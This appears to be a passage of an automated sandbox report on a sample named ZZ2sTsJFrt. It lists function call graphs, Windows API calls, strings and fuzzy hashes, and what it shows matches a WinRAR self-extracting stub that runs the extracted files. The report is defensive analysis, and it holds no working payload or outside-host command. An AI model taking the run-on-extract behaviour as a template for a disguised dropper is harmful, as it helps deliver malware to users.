                                                                            • Part of subcall function 00F1D453: _wcslen.LIBCMT ref: 00F1D47D
                                                                          • SetFocus.USER32(00000000), ref: 00F1B9B8
                                                                          • _swprintf.LIBCMT ref: 00F1BA24
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                            • Part of subcall function 00F1D4D4: GetDlgItem.USER32(00000068,00F5FCB8), ref: 00F1D4E8
                                                                            • Part of subcall function 00F1D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00F1AF07,00000001,?,?,00F1B7B9,00F3506C,00F5FCB8,00F5FCB8,00001000,00000000,00000000), ref: 00F1D510
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F1D51B
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00F335F4), ref: 00F1D529
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1D53F
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F1D559
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1D59D
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F1D5AB
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1D5BA
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1D5E1
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00F343F4), ref: 00F1D5F0
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00F1BA68
                                                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00F1BA90
                                                                          • GetTickCount.KERNEL32 ref: 00F1BAAE
                                                                          • _swprintf.LIBCMT ref: 00F1BAC2
                                                                          • GetLastError.KERNEL32(?,00000011), ref: 00F1BAF4
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00F1BB43
                                                                          • _swprintf.LIBCMT ref: 00F1BB7C
                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00F1BBD0
                                                                          • GetCommandLineW.KERNEL32 ref: 00F1BBEA
                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00F1BC47
                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00F1BC6F
                                                                          • Sleep.KERNEL32(00000064), ref: 00F1BCB9
                                                                          • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00F1BCE2
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00F1BCEB
                                                                          • _swprintf.LIBCMT ref: 00F1BD1E
                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F1BD7D
                                                                          • SetDlgItemTextW.USER32(?,00000065,00F335F4), ref: 00F1BD94
                                                                          • GetDlgItem.USER32(?,00000065), ref: 00F1BD9D
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F1BDAC
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F1BDBB
                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F1BE68
                                                                          • _wcslen.LIBCMT ref: 00F1BEBE
                                                                          • _swprintf.LIBCMT ref: 00F1BEE8
                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F1BF32
                                                                          • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00F1BF4C
                                                                          • GetDlgItem.USER32(?,00000068), ref: 00F1BF55
                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00F1BF6B
                                                                          • GetDlgItem.USER32(?,00000066), ref: 00F1BF85
                                                                          • SetWindowTextW.USER32(00000000,00F4A472), ref: 00F1BFA7
                                                                          • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00F1C007
                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F1C01A
                                                                          • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00F1C0BD
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00F1C197
                                                                          • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00F1C1D9
                                                                            • Part of subcall function 00F1C73F: __EH_prolog.LIBCMT ref: 00F1C744
                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F1C1FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                          • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                          • API String ID: 3445078344-2238251102
                                                                          • Opcode ID: 86ea63b944d17d996b258540b79b576cc8fd8c6c29dad5d34a550f7168daf8d0
                                                                          • Instruction ID: ae0a5b06926fe2f54e552a78bfff573f7f17d633ad43700cd92771a4e9ea9084
                                                                          • Opcode Fuzzy Hash: 86ea63b944d17d996b258540b79b576cc8fd8c6c29dad5d34a550f7168daf8d0
                                                                          • Instruction Fuzzy Hash: 3742FB71D8425CBAEB21DB709C49FFE377CAB12750F040055FA41A60E2CBB95A89FB61
                                                                          Function 00F10863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 268 f10863-f10886 call f1ec50 GetModuleHandleW 271 f108e7-f10b48 268->271 272 f10888-f1089f GetProcAddress 268->272 275 f10c14-f10c40 GetModuleFileNameW call f0c29a call f10602 271->275 276 f10b4e-f10b59 call f275fb 271->276 273 f108a1-f108b7 272->273 274 f108b9-f108c9 GetProcAddress 272->274 273->274 277 f108e5 274->277 278 f108cb-f108e0 274->278 292 f10c42-f10c4e call f0b146 275->292 276->275 286 f10b5f-f10b8d GetModuleFileNameW CreateFileW 276->286 277->271 278->277 287 f10c08-f10c0f CloseHandle 286->287 288 f10b8f-f10b9b SetFilePointer 286->288 287->275 288->287 290 f10b9d-f10bb9 ReadFile 288->290 290->287 294 f10bbb-f10be0 290->294 297 f10c50-f10c5b call f1081b 292->297 298 f10c7d-f10ca4 call f0c310 GetFileAttributesW 292->298 296 f10bfd-f10c06 call f10371 294->296 296->287 305 f10be2-f10bfc call f1081b 296->305 297->298 307 f10c5d-f10c7b CompareStringW 297->307 308 f10ca6-f10caa 298->308 309 f10cae 298->309 305->296 307->298 307->308 308->292 311 f10cac 308->311 312 f10cb0-f10cb5 309->312 311->312 313 f10cb7 312->313 314 f10cec-f10cee 312->314 317 f10cb9-f10ce0 call f0c310 GetFileAttributesW 313->317 315 f10cf4-f10d0b call f0c2e4 call f0b146 314->315 316 f10dfb-f10e05 314->316 327 f10d73-f10da6 call f04092 AllocConsole 315->327 328 f10d0d-f10d6e call f1081b * 2 call f0e617 call f04092 call f0e617 call f1a7e4 315->328 322 f10ce2-f10ce6 317->322 323 f10cea 317->323 322->317 325 f10ce8 322->325 323->314 325->314 333 f10df3-f10df5 ExitProcess 327->333 334 f10da8-f10ded GetCurrentProcessId AttachConsole call f23e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(kernel32), ref: 00F1087C
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F1088E
                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F108BF
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F10B69
                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F10B83
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F10B93
                                                                          • ReadFile.KERNEL32(00000000,?,00007FFE,00F33C7C,00000000), ref: 00F10BB1
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00F10C09
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F10C1E
                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00F33C7C,?,00000000,?,00000800), ref: 00F10C72
                                                                          • GetFileAttributesW.KERNELBASE(?,?,00F33C7C,00000800,?,00000000,?,00000800), ref: 00F10C9C
                                                                          • GetFileAttributesW.KERNEL32(?,?,00F33D44,00000800), ref: 00F10CD8
                                                                            • Part of subcall function 00F1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F10836
                                                                            • Part of subcall function 00F1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0F2D8,Crypt32.dll,00000000,00F0F35C,?,?,00F0F33E,?,?,?), ref: 00F10858
                                                                          • _swprintf.LIBCMT ref: 00F10D4A
                                                                          • _swprintf.LIBCMT ref: 00F10D96
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          • AllocConsole.KERNEL32 ref: 00F10D9E
                                                                          • GetCurrentProcessId.KERNEL32 ref: 00F10DA8
                                                                          • AttachConsole.KERNEL32(00000000), ref: 00F10DAF
                                                                          • _wcslen.LIBCMT ref: 00F10DC4
                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00F10DD5
                                                                          • WriteConsoleW.KERNEL32(00000000), ref: 00F10DDC
                                                                          • Sleep.KERNEL32(00002710), ref: 00F10DE7
                                                                          • FreeConsole.KERNEL32 ref: 00F10DED
                                                                          • ExitProcess.KERNEL32 ref: 00F10DF5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                          • API String ID: 1207345701-3298887752
                                                                          • Opcode ID: e842977a879f83b2ba9b5a51e54c6c176344f1f6f2d2c9c32c255a6dd4a9eaae
                                                                          • Instruction ID: 6518a0c2dd759094ec561dc225a3c5d6dda3875aceb748b7edc767df3cc4680a
                                                                          • Opcode Fuzzy Hash: e842977a879f83b2ba9b5a51e54c6c176344f1f6f2d2c9c32c255a6dd4a9eaae
                                                                          • Instruction Fuzzy Hash: B4D182B1408384AFD325DF60CC49BDFBBE8BB85728F40491DF58596151CBB49688FBA2
                                                                          Function 00F1C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 347 f1c73f-f1c757 call f1eb78 call f1ec50 352 f1d40d-f1d418 347->352 353 f1c75d-f1c787 call f1b314 347->353 353->352 356 f1c78d-f1c792 353->356 357 f1c793-f1c7a1 356->357 358 f1c7a2-f1c7b7 call f1af98 357->358 361 f1c7b9 358->361 362 f1c7bb-f1c7d0 call f11fbb 361->362 365 f1c7d2-f1c7d6 362->365 366 f1c7dd-f1c7e0 362->366 365->362 367 f1c7d8 365->367 368 f1c7e6 366->368 369 f1d3d9-f1d404 call f1b314 366->369 367->369 370 f1c7ed-f1c7f0 368->370 371 f1ca7c-f1ca7e 368->371 372 f1ca5f-f1ca61 368->372 373 f1c9be-f1c9c0 368->373 369->357 384 f1d40a-f1d40c 369->384 370->369 378 f1c7f6-f1c850 call f1a64d call f0bdf3 call f0a544 call f0a67e call f06edb 370->378 371->369 376 f1ca84-f1ca8b 371->376 372->369 375 f1ca67-f1ca77 SetWindowTextW 372->375 373->369 377 f1c9c6-f1c9d2 373->377 375->369 376->369 380 f1ca91-f1caaa 376->380 381 f1c9d4-f1c9e5 call f27686 377->381 382 f1c9e6-f1c9eb 377->382 433 f1c98f-f1c9a4 call f0a5d1 378->433 385 f1cab2-f1cac0 call f23e13 380->385 386 f1caac 380->386 381->382 389 f1c9f5-f1ca00 call f1b48e 382->389 390 f1c9ed-f1c9f3 382->390 384->352 385->369 403 f1cac6-f1cacf 385->403 386->385 394 f1ca05-f1ca07 389->394 390->394 399 f1ca12-f1ca32 call f23e13 call f23e3e 394->399 400 f1ca09-f1ca10 call f23e13 394->400 421 f1ca34-f1ca3b 399->421 422 f1ca4b-f1ca4d 399->422 400->399 407 f1cad1-f1cad5 403->407 408 f1caf8-f1cafb 403->408 410 f1cb01-f1cb04 407->410 413 f1cad7-f1cadf 407->413 408->410 411 f1cbe0-f1cbee call f10602 408->411 415 f1cb11-f1cb2c 410->415 416 f1cb06-f1cb0b 410->416 431 f1cbf0-f1cc04 call f2279b 411->431 413->369 419 f1cae5-f1caf3 call f10602 413->419 434 f1cb76-f1cb7d 415->434 435 f1cb2e-f1cb68 415->435 416->411 416->415 419->431 428 f1ca42-f1ca4a call f27686 421->428 429 f1ca3d-f1ca3f 421->429 422->369 430 f1ca53-f1ca5a call f23e2e 422->430 428->422 429->428 430->369 446 f1cc11-f1cc62 call f10602 call f1b1be GetDlgItem SetWindowTextW SendMessageW call f23e49 431->446 447 f1cc06-f1cc0a 431->447 451 f1c855-f1c869 SetFileAttributesW 433->451 452 f1c9aa-f1c9b9 call f0a55a 433->452 440 f1cbab-f1cbce call f23e13 * 2 434->440 441 f1cb7f-f1cb97 call f23e13 434->441 470 f1cb6a 435->470 471 f1cb6c-f1cb6e 435->471 440->431 475 f1cbd0-f1cbde call f105da 440->475 441->440 457 f1cb99-f1cba6 call f105da 441->457 481 f1cc67-f1cc6b 446->481 447->446 453 f1cc0c-f1cc0e 447->453 458 f1c90f-f1c91f GetFileAttributesW 451->458 459 f1c86f-f1c8a2 call f0b991 call f0b690 call f23e13 451->459 452->369 453->446 457->440 458->433 468 f1c921-f1c930 DeleteFileW 458->468 490 f1c8b5-f1c8c3 call f0bdb4 459->490 491 f1c8a4-f1c8b3 call f23e13 459->491 468->433 474 f1c932-f1c935 468->474 470->471 471->434 478 f1c939-f1c965 call f04092 GetFileAttributesW 474->478 475->431 488 f1c937-f1c938 478->488 489 f1c967-f1c97d MoveFileW 478->489 481->369 485 f1cc71-f1cc85 SendMessageW 481->485 485->369 488->478 489->433 492 f1c97f-f1c989 MoveFileExW 489->492 490->452 497 f1c8c9-f1c908 call f23e13 call f1fff0 490->497 491->490 491->497 492->433 497->458
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F1C744
                                                                            • Part of subcall function 00F1B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00F1B3FB
                                                                          • _wcslen.LIBCMT ref: 00F1CA0A
                                                                          • _wcslen.LIBCMT ref: 00F1CA13
                                                                          • SetWindowTextW.USER32(?,?), ref: 00F1CA71
                                                                          • _wcslen.LIBCMT ref: 00F1CAB3
                                                                          • _wcsrchr.LIBVCRUNTIME ref: 00F1CBFB
                                                                          • GetDlgItem.USER32(?,00000066), ref: 00F1CC36
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00F1CC46
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,00F4A472), ref: 00F1CC54
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F1CC7F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 2804936435-312220925
                                                                          • Opcode ID: fe3bb477bffefc721d21cc5938546c94e1fdbf8a9d738eed978c397af9f2a655
                                                                          • Instruction ID: c9f2d61fdc2627c5c3870c8b2ac83aae4ac9244c544647c96888c0665195ec41
                                                                          • Opcode Fuzzy Hash: fe3bb477bffefc721d21cc5938546c94e1fdbf8a9d738eed978c397af9f2a655
                                                                          • Instruction Fuzzy Hash: 7AE144B2D40219AADF25DBA0DD85EEE77BCAB04350F4440A5F645E7050EB789F88AF60
                                                                          Function 00F0DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F0DA70
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F0DAAC
                                                                            • Part of subcall function 00F0C29A: _wcslen.LIBCMT ref: 00F0C2A2
                                                                            • Part of subcall function 00F105DA: _wcslen.LIBCMT ref: 00F105E0
                                                                            • Part of subcall function 00F11B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F0BAE9,00000000,?,?,?,0001045C), ref: 00F11BA0
                                                                          • _wcslen.LIBCMT ref: 00F0DDE9
                                                                          • __fprintf_l.LIBCMT ref: 00F0DF1C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                          • API String ID: 566448164-801612888
                                                                          • Opcode ID: 6901d8f51130767490b556f269b3360fcc240ddcaaea4f5d5d57204d87a13823
                                                                          • Instruction ID: 9ed86cb1479bf8e1ad050fa27b5618c534354c9b281f4c9e6a180ff9a088ef5a
                                                                          • Opcode Fuzzy Hash: 6901d8f51130767490b556f269b3360fcc240ddcaaea4f5d5d57204d87a13823
                                                                          • Instruction Fuzzy Hash: BC32CE72A00218EADF24EFA8CC41BEA77A5FF48320F40455AF905972D1EBB5D985FB50
                                                                          Function 00F1D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00F1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1B579
                                                                            • Part of subcall function 00F1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B58A
                                                                            • Part of subcall function 00F1B568: IsDialogMessageW.USER32(0001045C,?), ref: 00F1B59E
                                                                            • Part of subcall function 00F1B568: TranslateMessage.USER32(?), ref: 00F1B5AC
                                                                            • Part of subcall function 00F1B568: DispatchMessageW.USER32(?), ref: 00F1B5B6
                                                                          • GetDlgItem.USER32(00000068,00F5FCB8), ref: 00F1D4E8
                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00F1AF07,00000001,?,?,00F1B7B9,00F3506C,00F5FCB8,00F5FCB8,00001000,00000000,00000000), ref: 00F1D510
                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F1D51B
                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00F335F4), ref: 00F1D529
                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1D53F
                                                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F1D559
                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1D59D
                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F1D5AB
                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1D5BA
                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1D5E1
                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00F343F4), ref: 00F1D5F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                          • String ID: \
                                                                          • API String ID: 3569833718-2967466578
                                                                          • Opcode ID: a0985807069c662a8702d8d611284ceca3c0047faa73a16a1f3b52cbe004f382
                                                                          • Instruction ID: 9b9f6937f6eb87305bbd3e6e9f59e01719789d10356ee130778f80b8face5d2b
                                                                          • Opcode Fuzzy Hash: a0985807069c662a8702d8d611284ceca3c0047faa73a16a1f3b52cbe004f382
                                                                          • Instruction Fuzzy Hash: EF31D57154934ABFD301DF20DC4AFAF7FACEB82718F00050CF961961A0DBA49A09A776
                                                                          Function 00F1D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 836 f1d78f-f1d7a7 call f1ec50 839 f1d9e8-f1d9f0 836->839 840 f1d7ad-f1d7b9 call f23e13 836->840 840->839 843 f1d7bf-f1d7e7 call f1fff0 840->843 846 f1d7f1-f1d7ff 843->846 847 f1d7e9 843->847 848 f1d801-f1d804 846->848 849 f1d812-f1d818 846->849 847->846 851 f1d808-f1d80e 848->851 850 f1d85b-f1d85e 849->850 850->851 852 f1d860-f1d866 850->852 853 f1d810 851->853 854 f1d837-f1d844 851->854 858 f1d868-f1d86b 852->858 859 f1d86d-f1d86f 852->859 855 f1d822-f1d82c 853->855 856 f1d9c0-f1d9c2 854->856 857 f1d84a-f1d84e 854->857 860 f1d81a-f1d820 855->860 861 f1d82e 855->861 862 f1d9c6 856->862 857->862 863 f1d854-f1d859 857->863 858->859 864 f1d882-f1d898 call f0b92d 858->864 859->864 865 f1d871-f1d878 859->865 860->855 866 f1d830-f1d833 860->866 861->854 870 f1d9cf 862->870 863->850 871 f1d8b1-f1d8bc call f0a231 864->871 872 f1d89a-f1d8a7 call f11fbb 864->872 865->864 867 f1d87a 865->867 866->854 867->864 873 f1d9d6-f1d9d8 870->873 882 f1d8d9-f1d8e6 ShellExecuteExW 871->882 883 f1d8be-f1d8d5 call f0b6c4 871->883 872->871 881 f1d8a9 872->881 876 f1d9e7 873->876 877 f1d9da-f1d9dc 873->877 876->839 877->876 880 f1d9de-f1d9e1 ShowWindow 877->880 880->876 881->871 882->876 885 f1d8ec-f1d8f9 882->885 883->882 887 f1d8fb-f1d902 885->887 888 f1d90c-f1d90e 885->888 887->888 891 f1d904-f1d90a 887->891 889 f1d910-f1d919 888->889 890 f1d925-f1d944 call f1dc3b 888->890 889->890 898 f1d91b-f1d923 ShowWindow 889->898 892 f1d97b-f1d987 CloseHandle 890->892 905 f1d946-f1d94e 890->905 891->888 891->892 895 f1d989-f1d996 call f11fbb 892->895 896 f1d998-f1d9a6 892->896 895->870 895->896 896->873 899 f1d9a8-f1d9aa 896->899 898->890 899->873 902 f1d9ac-f1d9b2 899->902 902->873 904 f1d9b4-f1d9be 902->904 904->873 905->892 906 f1d950-f1d961 GetExitCodeProcess 905->906 906->892 907 f1d963-f1d96d 906->907 908 f1d974 907->908 909 f1d96f 907->909 908->892 909->908
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00F1D7AE
                                                                          • ShellExecuteExW.SHELL32(?), ref: 00F1D8DE
                                                                          • ShowWindow.USER32(?,00000000), ref: 00F1D91D
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00F1D959
                                                                          • CloseHandle.KERNEL32(?), ref: 00F1D97F
                                                                          • ShowWindow.USER32(?,00000001), ref: 00F1D9E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                          • String ID: .exe$.inf
                                                                          • API String ID: 36480843-3750412487
